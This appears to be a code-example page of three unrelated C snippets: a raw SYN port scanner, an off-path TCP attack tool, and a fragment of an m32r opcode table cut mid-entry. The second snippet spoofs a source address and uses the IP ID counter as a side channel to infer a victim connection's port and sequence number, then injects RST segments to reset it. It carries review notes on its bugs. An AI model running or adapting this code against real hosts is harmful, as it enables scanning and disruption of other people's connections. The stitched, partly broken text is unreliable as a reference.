Пример #1
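/*
 * parse_port: decimal TCP port taken from a command-line string.
 *
 * Returns the value in 0..65535, or -1 when the text is empty, carries
 * trailing garbage, or is out of range.  Replaces atoi(), which turns any
 * non-numeric argument into 0 without reporting it.
 */
static int
parse_port(const char *s)
{
  char *end = NULL;
  long v;

  if (s == NULL || *s == '\0')
    return -1;
  v = strtol(s, &end, 10);
  if (*end != '\0' || v < 0 || v > 65535)
    return -1;
  return (int)v;
}

/*
 * Entry point.
 *
 * argv[1]  address written as the source of the probes (via str_to_ip)
 * argv[2]  destination address
 * argv[3]  first port; also the initial hostport handed to createSocket()
 * argv[4]  last port
 * argv[5]  gateway address, resolved with ARPRequest() to obtain dmac
 *
 * Each loop iteration sends one SYN() while hostport has not yet reached
 * eport, then drains whatever recvlayers() captured; a reply carrying both
 * SYN and ACK is printed and answered with RST() so the peer does not keep
 * a half-open connection.  The loop ends when kbhit() reports a keypress.
 * if_menu/ARPRequest/ARPReply/createSocket/recvlayers/findlayer are project
 * helpers whose contracts are not visible here; str_to_ip's return value is
 * not checked because its failure convention is unknown (TODO confirm it
 * follows ARPRequest's "< 0 on error").
 *
 * Exit status: 1 on argument, interface or ARP failure, 0 otherwise.
 */
int
main(int argc, char **argv)
{
  struct layer *head = NULL, *tcp = NULL;
  struct TCPSocket ts;
  struct MAC imac, dmac;
  uint32_t ip, dip, gip;
  uint16_t eport;
  int sport, lport, n;

  if (argc < 6)
    usage(*argv);

  /* Validate the numeric arguments before touching the network, so a typo
     fails fast instead of silently becoming port 0. */
  sport = parse_port(argv[3]);
  if (sport < 0) {
    fprintf(stderr, "error: invalid start port '%s'\n", argv[3]);
    exit(1);
  }
  lport = parse_port(argv[4]);
  if (lport < 0) {
    fprintf(stderr, "error: invalid end port '%s'\n", argv[4]);
    exit(1);
  }
  eport = (uint16_t)lport;

  if (if_menu(&imac) < 0)
    exit(1);

  str_to_ip(argv[1], &ip);
  str_to_ip(argv[2], &dip);
  str_to_ip(argv[5], &gip);

  /* Without the gateway's MAC nothing can leave the local segment. */
  if (ARPRequest(&imac, &dmac, ip, gip, 5) < 0) {
    fprintf(stderr, "error: no route to host.\n");
    exit(1);
  }
  ARPReply(&imac, ip, &dmac, gip);

  createSocket(&ts, &imac, &dmac, ip, dip, sport, sport);
  filterDatalink("tcp");

  while (!kbhit()) {
    /* The original post-incremented hostport on every iteration, even once
       it was past eport; if hostport is a 16-bit field (as eport is) that
       eventually wraps and restarts the probes.  Advance it only while a
       port remains — the sequence of ports actually sent is unchanged. */
    if (ts.hostport < eport) {
      ts.hostport++;
      SYN(&ts);
    }

    head = recvlayers(&n);
    if (head == NULL)
      continue;

    tcp = findlayer(head, LT_TCP);
    if (tcp != NULL) {
      struct tcphdr *t = (xtcp)tcp->proto;

      /* Only replies carrying both SYN and ACK are reported; anything else
         (e.g. a bare RST) is dropped with the rest of the capture. */
      if ((t->th_flags & (TH_SYN | TH_ACK)) == (TH_SYN | TH_ACK)) {
        printf("recv: SYN-ACK from port %d\n", ntohs(t->th_sport));
        printlayers(tcp);
        /* NOTE(review): RST() takes its source port from ts.hostport, which
           may already have moved past the port this reply answers
           (t->th_dport); confirm RST() derives the port from the reply,
           otherwise the reset may not match the half-open connection. */
        RST(&ts);
      }
    }
    rmlayers(head);
  }

  closeDatalink();
  return 0;
}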
Пример #2
/*
 * Entry point.
 *
 * Positional arguments (usage() is called when fewer than 9 are given):
 *   argv[1] interface name, opened twice with if_openbyname(): dl carries
 *           the TCP segments, icmp_dl the echo probes and their replies
 *   argv[2] real_ip    source of the ARP and echo traffic (presumably this
 *                      host's own address)
 *   argv[3] gw_ip      parsed into gw_ip but not otherwise used here; the
 *                      MAC stored in gwmac comes from ARPRequest() for
 *                      server_ip, the one in cli_mac from ARPRequest() for
 *                      spoof_ip
 *   argv[4] spoof_ip   address the TCP segments claim as their source
 *   argv[5] server_ip  peer the segments are addressed to
 *   argv[6] start_port, argv[7] end_port   range walked in phase one
 *   argv[8] server_port
 *   argv[9] optional serv_seq (strtoul; reset to 0 on ERANGE)
 *
 * Both phases use the same measurement: echo_get_id() returns the IP ID
 * field of an echo reply, and the difference between two consecutive
 * readings (ip_id_d) is taken as a proxy for how many datagrams that host
 * sent in between.  Phase one (the loop over start_port..end_port) varies
 * ts.port and keeps the value with the smallest delta as guess_port; phase
 * two varies ts.seq the same way and keeps guess_serv_seq.  A host whose
 * IP ID field is randomised, or a network that drops datagrams with a
 * spoofed source, does not expose this counter.
 *
 * Defects left as-is and marked inline with NOTE(review): start_port is
 * read before it is assigned, dly_serv is never assigned, and the phase-two
 * loop condition can never become false.
 */
int
main(int argc, char **argv)
{

	struct layer *proto;
	struct MAC localmac,gwmac,cli_mac;
	uint32_t real_ip,spoof_ip,gw_ip,client_ip,server_ip,dly,
		dly_serv;
	struct TCPSocket ts;
	struct datalink icmp_dl,dl;
	uint16_t start_port,end_port,server_port,
		ip_id_a,ip_id_b,ip_id_d;
	unsigned long i;
	/* -1 stored in an unsigned short becomes USHRT_MAX: "no minimum yet". */
	unsigned short guess_port,min_delta=-1;
	unsigned long guess_serv_seq,serv_seq=0;
	uint32_t start_guess,end_guess;
	int guess_inc;
	char icmp_filter[256];
	if( argc < 9 )
		usage(*argv);
	/* A non-zero serv_seq selects the short path at the "if(serv_seq != 0)"
	   block below, which exits before the phase-two search loop. */
	if( argc >=  10){
		errno = 0;
		serv_seq = strtoul(argv[9],NULL,10);
		if(errno)
			serv_seq =0;
	}

	srand(time(NULL));
	memset(&dl,0,sizeof(dl));
	if( if_openbyname(&dl,argv[1]) < 0 ){
		fprintf(stderr,"open_link_byname failed\n");
		return 1;
	}

	/* sizeof(dl) rather than sizeof(icmp_dl); harmless only because both are
	   struct datalink. */
	memset(&icmp_dl,0,sizeof(dl));
	if( if_openbyname(&icmp_dl,argv[1]) < 0 ){
		fprintf(stderr,"open_link_byname failed\n");
		return 1;
	}
	/* NOTE(review): start_port has no initializer and is first assigned from
	   argv[6] further down, so this reads an uninitialized variable (UB).
	   guess_port is overwritten inside the phase-one loop whenever a smaller
	   delta is seen, which hides the problem in practice. */
	guess_port = start_port;
	str_to_ip(argv[2],&real_ip);	
	str_to_ip(argv[3],&gw_ip);	
	str_to_ip(argv[4],&spoof_ip);	
	str_to_ip(argv[5],&server_ip);	
	memcpy(&localmac.mac,dl.dl_mac,6);

	/* Capture only ICMP type 0 (echo reply) sent by spoof_ip or server_ip to
	   real_ip, i.e. the answers to echo_get_id()'s probes. */
	snprintf(icmp_filter,sizeof(icmp_filter),"icmp and icmp[0] = 0 and "
		"((src %s and dst %s) or (src %s and dst %s))",
		argv[4],argv[2],argv[5],argv[2]);
	filterDatalink(&icmp_dl,icmp_filter);
	/* MAC resolution is only meaningful on Ethernet links; on other link
	   types gwmac and cli_mac are left unset. */
	if( dl.dl_pcap->linktype == DLT_EN10MB ){
		if( ARPRequest(&dl,&localmac,&gwmac,real_ip,server_ip,5) < 0 ){
			fprintf(stderr,"lan gateway did not reply arp\n");
		exit(1);
		}



		/* Same message as above although this request is for spoof_ip. */
		if( ARPRequest(&dl,&localmac,&cli_mac,real_ip,spoof_ip,5) < 0 ){
			fprintf(stderr,"lan gateway did not reply arp\n");
		exit(1);
		}

	}
	/* atoi() reports nothing on bad input; a non-numeric port becomes 0. */
	start_port = atoi(argv[6]);
	end_port = atoi(argv[7]);
	server_port = atoi(argv[8]);
	createSocket(&ts,&localmac,&gwmac,spoof_ip,
		server_ip,start_port,server_port);
	ts.rcvwin = 0;
	
	ip_id_a = ip_id_b = ip_id_d = 0;
	/* NOTE(review): this call writes dly, but the printf and the usleep()
	   in the loop below read dly_serv, which is never assigned anywhere in
	   this function (uninitialized read). */
	echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,server_ip,
		&dly,&ip_id_a);
	printf("delay to server= %lu\n",dly_serv);		

	echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
		&dly,&ip_id_a);
	printf("delay = %lu\n",dly);		
	/* Phase one: one SYN per port in the range, then re-read spoof_ip's IP ID
	   and compare with the previous reading. */
	for( i = start_port; i<= end_port; i++ ){

		SYN(&ts,&dl);
		
		usleep((dly+dly_serv));
                echo_get_id(&icmp_dl,&localmac,&cli_mac,real_ip,spoof_ip,
                &dly,&ip_id_b);

		ip_id_d = ip_id_b - ip_id_a;
		ip_id_a = ip_id_b;
		/* Strict '<': on ties the earliest port keeps the guess. */
		if(ip_id_d < min_delta){
			min_delta = ip_id_d;
			guess_port = i;
		}

		/* Two statements share each of the next two lines; the exit(0) skips
		   closeDatalink() for both handles. */
		printf("for port %d ip_id delta = %x\n",ts.port,ip_id_d);			if(ip_id_d == 0 ){
			printf( " the client port is: %d\n",ts.port);	exit(0);
		}

		ts.port++;
		ts.seq++;
	}
	printf("guessed port is %d\n",guess_port);
	/* Reverse the socket's direction for phase two. */
	ts.ip = server_ip;
	ts.port = server_port;
	ts.hostip = spoof_ip;
	ts.hostport = guess_port;

	printf("finding serv.seq using 16k window\n");
	min_delta = -1;
/* Short path when argv[9] supplied a sequence number: send one ACK at
   serv_seq+65536 and one at serv_seq, print the IP ID delta observed after
   each, and exit.  The closing brace of this block is the unindented '}'
   after the second exit(0); everything after it runs only when serv_seq
   is 0. */
if(serv_seq != 0 ){
	ts.seq = serv_seq+65536;
	ts.gatewaymac = cli_mac;

	echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
		
		&dly,&ip_id_a);


	ts.ack = 0;
	ACK(&ts,&dl);
 	//ts.ack = 2<<30;
	//ACK(&ts,&dl);
		
        echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
                &dly,&ip_id_b);

	ip_id_d = ip_id_b - ip_id_a;

	printf("for seq %lu delta = %d\n",serv_seq,ip_id_d);



	ts.seq = serv_seq;

	echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
		
		&dly,&ip_id_a);


	ts.ack = 0;
	ACK(&ts,&dl);
 	//ts.ack = 2<<30;
	//ACK(&ts,&dl);
		
        echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
                &dly,&ip_id_b);

	ip_id_d = ip_id_b - ip_id_a;

	/* The label says serv_seq+65536 but the ACK just sent used serv_seq;
	   the two printed lines are swapped relative to what was sent. */
	printf("for seq %lu delta = %d\n",serv_seq+65536,ip_id_d);
	closeDatalink(&dl);
	closeDatalink(&icmp_dl);
	exit(0);
}
	ip_id_a = ip_id_b = ip_id_d = 0;

	ts.gatewaymac = cli_mac;
	echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
		
		&dly,&ip_id_a);
	/* Phase two: walk the 32-bit sequence space downwards from 0xffffffff in
	   steps of 16384 (guess_inc is negative). */
	start_guess = 0xffffffff;
	end_guess = 16385;
	guess_inc = -16384;
	/* NOTE(review): abs() never yields a negative value, so this condition
	   is always true and end_guess never stops the loop; the only exit is
	   the exit(0) below when min_delta reaches 1.  With i unsigned long the
	   subtraction also wraps rather than going negative. */
	for( i = start_guess; abs(end_guess-i)>=0 ; i +=guess_inc ){


		ts.ack = 0;
		ts.seq = i;
		/* Two ACKs per guess (the second pair of lines is commented out). */
		ACK(&ts,&dl);
	 	//ts.ack = 2<<30;
		//ts.seq=i;
		ACK(&ts,&dl);
		
                echo_get_id(&icmp_dl,&localmac,&gwmac,real_ip,spoof_ip,
                &dly,&ip_id_b);

		ip_id_d = ip_id_b - ip_id_a;
		ip_id_a = ip_id_b;
		if(ip_id_d < min_delta){
			min_delta = ip_id_d;
			guess_serv_seq = i;
			/* A delta of exactly 1 is treated as the answer. */
			if(min_delta == 1)
			{

			/* %lu assumes ts.seq is unsigned long — check struct TCPSocket. */
			printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);		

			RST(&ts,&dl);	
			exit(0);
			}

		}

		printf("for seq %lu ip_id delta = %x\n",ts.seq,ip_id_d);		

	}

	/* Unreachable in practice given the loop condition above; kept as the
	   intended fall-through path. */
	printf("guessed sequence = %lu\n",guess_serv_seq);

	ts.seq = guess_serv_seq;
	
	RST(&ts,&dl);	
	closeDatalink(&dl);
	closeDatalink(&icmp_dl);
	return 0;
}
Пример #3
/* f-op1.number.f-r1.dr.f-op2.number.f-r2.src2.f-uimm16.number. */
/*  31 */  { 32, 32, 0xf0f0ffff },
};

/* A(a): attribute bit for CGEN_INSN_<a> (CGEN_CAT3 presumably pastes the
   three tokens); ORed into the attribute word of the insn entries below,
   e.g. 0|A(PARALLEL). */
#define A(a) (1 << CGEN_CAT3 (CGEN_INSN,_,a))
/* SYN(n)/FMT(n): pointer to the n-th syntax and format table entries; the
   insn table refers to both by index rather than by address. */
#define SYN(n) (& syntax_table[n])
#define FMT(n) (& format_table[n])

const CGEN_INSN m32r_cgen_insn_table_entries[MAX_INSNS] =
{
  /* null first entry, end of all hash chains */
  { { 0 }, 0 },
/* add $dr,$sr */
  {
    { 1, 1, 1, 1 },
    "add", "add", SYN (0), FMT (0), 0xa0,
    { 2, 0|A(PARALLEL), { (1<<MACH_M32R) } }
  },
/* add3 $dr,$sr,#$slo16 */
  {
    { 1, 1, 1, 1 },
    "add3", "add3", SYN (1), FMT (1), 0x80a00000,
    { 2, 0, { (1<<MACH_M32R) } }
  },
/* add3 $dr,$sr,$slo16 */
  {
    { 1, 1, 1, 1 },
    "add3.a", "add3", SYN (2), FMT (1), 0x80a00000,
    { 2, 0|A(ALIAS), { (1<<MACH_M32R) } }
  },
/* and $dr,$sr */